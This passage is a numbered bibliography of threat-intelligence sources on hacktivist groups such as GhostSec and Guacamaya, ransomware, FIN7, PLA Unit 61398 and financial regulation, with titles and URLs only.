27. Cyble Hacktivists Target Critical Infrastructure, Move Into Ransomware, accessed June 5, 2025, https://cyble.com/blog/hacktivists-infrastructure-move-into-ransomware/
28. Threat Actor Profile – GhostSec – Outpost24, accessed June 5, 2025, https://outpost24.com/blog/threat-actor-profile-ghostsec/
29. Dark Web Profile: GhostSec – SOCRadar® Cyber Intelligence Inc., accessed June 5, 2025, https://socradar.io/dark-web-profile-ghostsec/
30. Threat Actor Profile – Guacamaya hacktivist group – Outpost24, accessed June 5, 2025, https://outpost24.com/blog/threat-actor-profile-guacamaya/
31. Guacamaya (hacktivist group) – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/Guacamaya_(hacktivist_group)
32. DORA News – LEI and Digitalization – LEIReg, accessed June 5, 2025, https://www.leireg.de/en/guide-news/news/dora/
33. Frequently Asked Questions – Office of Financial Research (OFR), accessed June 5, 2025, https://www.financialresearch.gov/data/legal-entity-identifier/faqs/
34. BOYUSEC HACKERS – FBI, accessed June 5, 2025, https://www.fbi.gov/wanted/cyber/boyusec-hackers
35. PLA Unit 61398 – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/PLA_Unit_61398
36. Breaking Cyber News From Cyberint, accessed June 5, 2025, https://cyberint.com/news-feed/
37. Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector, accessed June 5, 2025, https://thehackernews.com/2024/09/microsoft-warns-of-new-inc-ransomware.html
38. Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike, accessed June 5, 2025, https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html
39. FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks | SentinelOne, accessed June 5, 2025, https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/
40. Nation-State Cyber Actors | Cybersecurity and Infrastructure Security Agency CISA, accessed June 5, 2025, https://www.cisa.gov/topics/cyber-threats-and-advisories/nation-state-cyber-actors